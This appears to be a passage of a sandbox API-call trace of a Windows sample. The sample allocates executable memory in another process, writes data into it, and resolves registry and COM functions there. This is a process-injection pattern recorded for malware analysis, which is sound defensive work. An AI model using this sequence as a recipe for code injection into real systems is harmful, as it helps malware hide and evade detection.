	[0155.059] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.059] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.059] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.059] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.059] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.059] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004008, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.060] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.060] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.060] lstrlenA (lpString="RegCloseKey") returned 11
	[0155.060] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.060] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc270*, nSize=0xc, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc270*, lpNumberOfBytesWritten=0x128494*=0xc) returned 1
	[0155.060] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.060] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.060] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.061] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.061] ResetEvent (hEvent=0x488) returned 1
	[0155.061] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.061] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.061] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.061] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.061] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.062] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x1000400c, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.062] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.062] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.062] lstrlenA (lpString="RegQueryInfoKeyW") returned 16
	[0155.062] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.062] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc2b2*, nSize=0x11, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc2b2*, lpNumberOfBytesWritten=0x128494*=0x11) returned 1
	[0155.063] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.063] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.063] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.063] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.063] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.063] ResetEvent (hEvent=0x488) returned 1
	[0155.063] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.063] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.064] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.064] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.064] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.064] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004010, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.064] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.064] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0155.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc336, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10
	[0155.064] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc336, cbMultiByte=-1, lpWideCharStr=0x23078e8, cchWideChar=10 | out: lpWideCharStr="ole32.dll") returned 10
	[0155.064] lstrlenW (lpString="ole32.dll") returned 9
	[0155.065] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.065] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x23078e8*, nSize=0x14, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x23078e8*, lpNumberOfBytesWritten=0x128494*=0x14) returned 1
	[0155.065] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128418 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128418*=0x70) returned 1
	[0155.065] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.065] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.065] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0xc, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x128410*=0xc) returned 1
	[0155.065] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438*, nSize=0x70, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesWritten=0x128410*=0x70) returned 1
	[0155.066] ResetEvent (hEvent=0x488) returned 1
	[0155.066] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.085] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128410*=0x70) returned 1
	[0155.085] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.085] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.085] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.085] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.086] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.086] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.086] lstrlenA (lpString="CoInitializeSecurity") returned 20
	[0155.086] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.086] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc30e*, nSize=0x15, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc30e*, lpNumberOfBytesWritten=0x128494*=0x15) returned 1
	[0155.086] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.086] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.086] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.087] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.087] ResetEvent (hEvent=0x488) returned 1
	[0155.087] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.087] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.087] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.087] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.087] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.088] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040c8, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.088] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.088] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.088] lstrlenA (lpString="CoCreateInstance") returned 16
	[0155.088] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.088] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc2fa*, nSize=0x11, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc2fa*, lpNumberOfBytesWritten=0x128494*=0x11) returned 1
	[0155.089] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.089] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.089] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.089] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.090] ResetEvent (hEvent=0x488) returned 1
	[0155.090] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.090] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.090] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.090] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.090] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.090] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040cc, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.090] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.091] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.091] lstrlenA (lpString="CoSetProxyBlanket") returned 17
	[0155.091] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.091] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc2e6*, nSize=0x12, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc2e6*, lpNumberOfBytesWritten=0x128494*=0x12) returned 1
	[0155.091] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.091] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.091] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.092] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.092] ResetEvent (hEvent=0x488) returned 1
	[0155.092] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.092] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.092] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.092] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.092] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.092] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040d0, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.093] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.093] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.093] lstrlenA (lpString="CoUninitialize") returned 14
	[0155.093] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.093] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc2d4*, nSize=0xf, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc2d4*, lpNumberOfBytesWritten=0x128494*=0xf) returned 1
	[0155.094] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.094] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.094] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.094] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.094] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.094] ResetEvent (hEvent=0x488) returned 1
	[0155.094] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.095] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.095] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.095] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.095] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.095] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040d4, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.095] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.096] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.096] lstrlenA (lpString="CoInitializeEx") returned 14
	[0155.096] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.096] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x26cc326*, nSize=0xf, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x26cc326*, lpNumberOfBytesWritten=0x128494*=0xf) returned 1
	[0155.096] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.096] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.096] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.097] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.097] ResetEvent (hEvent=0x488) returned 1
	[0155.097] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.097] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.097] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.098] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.098] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x100040d8, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.098] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.098] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0155.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0155.098] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23078e8
	[0155.098] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x26cc340, cbMultiByte=-1, lpWideCharStr=0x23078e8, cchWideChar=13 | out: lpWideCharStr="OLEAUT32.dll") returned 13
	[0155.098] lstrlenW (lpString="OLEAUT32.dll") returned 12
	[0155.098] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.098] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x23078e8*, nSize=0x1a, lpNumberOfBytesWritten=0x128494 | out: lpBuffer=0x23078e8*, lpNumberOfBytesWritten=0x128494*=0x1a) returned 1
	[0155.099] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128418 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128418*=0x70) returned 1
	[0155.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.099] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0x70000
	[0155.099] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x70000, lpBuffer=0x22ad0f0*, nSize=0xc, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x128410*=0xc) returned 1
	[0155.099] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438*, nSize=0x70, lpNumberOfBytesWritten=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesWritten=0x128410*=0x70) returned 1
	[0155.100] ResetEvent (hEvent=0x488) returned 1
	[0155.100] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.115] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128438, nSize=0x70, lpNumberOfBytesRead=0x128410 | out: lpBuffer=0x128438*, lpNumberOfBytesRead=0x128410*=0x70) returned 1
	[0155.115] VirtualFreeEx (hProcess=0x494, lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.115] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.115] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.115] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x23078e8) returned 1
	[0155.115] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.116] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.116] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.116] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
	[0155.116] VirtualAllocEx (hProcess=0x494, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0155.116] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x20000, lpBuffer=0x22ad0f0*, nSize=0x10, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x22ad0f0*, lpNumberOfBytesWritten=0x12840c*=0x10) returned 1
	[0155.116] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434*, nSize=0x70, lpNumberOfBytesWritten=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesWritten=0x12840c*=0x70) returned 1
	[0155.116] ResetEvent (hEvent=0x488) returned 1
	[0155.116] SignalObjectAndWait (hObjectToSignal=0x484, hObjectToWaitOn=0x488, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0155.117] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x12840c | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x12840c*=0x70) returned 1
	[0155.117] VirtualFreeEx (hProcess=0x494, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0155.117] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ad0f0) returned 1
	[0155.117] WriteProcessMemory (in: hProcess=0x494, lpBaseAddress=0x10004080, lpBuffer=0x1286b4*, nSize=0x4, lpNumberOfBytesWritten=0x1285fc | out: lpBuffer=0x1286b4*, lpNumberOfBytesWritten=0x1285fc*=0x4) returned 1
	[0155.117] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0155.118] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.118] ReadProcessMemory (in: hProcess=0x494, lpBaseAddress=0x60000, lpBuffer=0x128434, nSize=0x70, lpNumberOfBytesRead=0x128414 | out: lpBuffer=0x128434*, lpNumberOfBytesRead=0x128414*=0x70) returned 1
	[0155.118] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad0f0
